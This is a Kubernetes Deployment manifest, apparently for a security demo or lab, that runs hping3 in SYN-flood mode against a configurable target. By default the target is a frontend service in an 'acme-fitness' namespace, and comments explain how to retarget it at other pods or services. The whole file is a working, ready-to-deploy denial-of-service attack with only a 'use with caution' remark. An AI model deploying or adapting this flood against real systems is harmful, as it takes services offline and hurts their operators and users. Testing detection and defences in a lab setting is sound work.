apiVersion: apps/v1 kind: Deployment metadata: labels: app: ddos-attacker name: ddos-attacker spec: replicas: 1 selector: matchLabels: app: ddos-attacker template: metadata: labels: app: ddos-attacker spec: containers: - image: sflow/hping3 name: hping3 env: # Set TARGET_HOST/TARGET_PORT variables to your intended target # For Pod use pod-ip-address.namespace.pod.cluster-domain.local # Example: 10-34-4-65.acme-fitness.pod.cluster.local # For svc use svc_name.namespace.svc.cluster.local # Example : frontend.acme-fitness.svc.cluster.local # Flood Mode, use with caution! - name: TARGET_HOST value: "frontend.acme-fitness.svc.cluster.local" #value: "10-34-1-13.acme-fitness.pod.cluster.local" - name: TARGET_PORT # if pod use port 3000, if svc, then 80 value: "80" # -S --flood initiates DDoS SYN Flooding attack command: ["/usr/sbin/hping3"] args: [$(TARGET_HOST), "-p", $(TARGET_PORT), "-S", "--flood"]